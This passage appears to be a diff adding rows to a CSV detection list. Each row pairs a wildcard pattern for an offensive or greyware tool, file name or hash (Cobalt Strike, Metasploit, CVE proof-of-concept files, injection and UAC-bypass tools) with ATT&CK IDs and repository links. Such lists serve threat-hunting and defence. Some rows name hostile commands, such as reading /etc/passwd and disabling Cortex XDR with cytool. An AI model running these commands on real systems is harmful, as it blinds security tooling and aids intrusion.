Created.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/offsecginger/AggressorScripts","1","1","N/A","10","10","141","31","2022-01-01T19:04:27Z","2018-11-30T03:14:45Z"
+"*CustomKeyboardLayoutPersistence*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z"
+"*cut -d: -f1 /etc/passwd*","greyware_tool_keyword","cut","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*CVE-*.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.c*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.com*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.cpp*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.git*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - 
TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.py*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0008 - TA0009 - TA0010","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","1","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.reg*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.run*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.sh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.vb*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.vbe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - 
T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE-*.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gottburgm/Exploits","1","0","N/A","N/A","2","184","113","2020-04-17T07:28:55Z","2017-10-13T10:19:55Z"
+"*CVE*/exploit.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*CVE_*_exploited.txt*","offensive_tool_keyword","POC","A Safer PoC for CVE-2022-22965 (Spring4Shell)","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/colincowie/Safer_PoC_CVE-2022-22965","1","1","N/A","N/A","1","45","7","2022-05-27T12:56:40Z","2022-03-31T16:58:56Z"
+"*cve_2_MSF_exploit_Mapping*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z"
+"*CVE_20*.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*cve_2019_0708_bluekeep_fail*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*cve_2019_0708_bluekeep_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*cve_2020_0796_smbghost.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*cve-20.x64.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*cve-20.x86.dll*","offensive_tool_keyword","cobaltstrike","The Elevate Kit 
demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
+"*CVE-2020-5902-Scanner/scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/aqhmal/CVE-2020-5902-Scanner","1","0","N/A","N/A","1","54","22","2022-12-08T11:03:15Z","2020-07-05T06:19:09Z"
+"*CVE-2021-34527.ps1*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*cve-20220-26809_exploit.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z"
+"*CVE-2022-21882.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*cve-2022-23131.py *","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","0","N/A","N/A","1","23","11","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z"
+"*cve-2022-26809-scanVuln.py*","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","1","N/A","N/A","1","62","26","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z"
+"*CVE-2022-30190-follina-Office-MSDT-Fixed*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z"
+"*CVE-2023-20887.git*","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation 
tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z"
+"*cve-2023-21554.nse*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A",,"N/A",,,
+"*CVE-2023-23397.ps1*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z"
+"*cvescanner.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z"
+"*cyberark/ACLight*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z"
+"*cyberark/kubesploit*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*cyberark/PipeViewer*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information 
about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z"
+"*cypheroth -u neo4j -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*cytool.exe event_collection disable*","greyware_tool_keyword","cytool","Disables event collection","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A"
+"*cytool.exe protect disable*","greyware_tool_keyword","cytool","Disables protection on Cortex XDR files processes registry and services","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A"
+"*cytool.exe runtime disable*","greyware_tool_keyword","cytool","Disables Cortex XDR (Even with tamper protection enabled)","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A"
+"*cytool.exe startup disable*","greyware_tool_keyword","cytool","Disables the cortex agent on startup","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","8","9","N/A","N/A","N/A","N/A"
+"*-d kali-linux *","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*D00MFist/Mystikal*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z"
+"*D00Movenok/HTMLSmuggler*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z"
+"*d090766c75d998b019d651fbb0c04112c6feb0f754628751682708e13baf2744*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*d09ccee4-pass-word-0000-98677e2356fd*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack 
it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*D1rkInject.cpp*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*D1rkInject.exe*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*D1rkInject.iobj*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*D1rkInject.log*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*D1rkInject.sln*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process 
and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
+"*D1rkInject.vcxproj*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z"
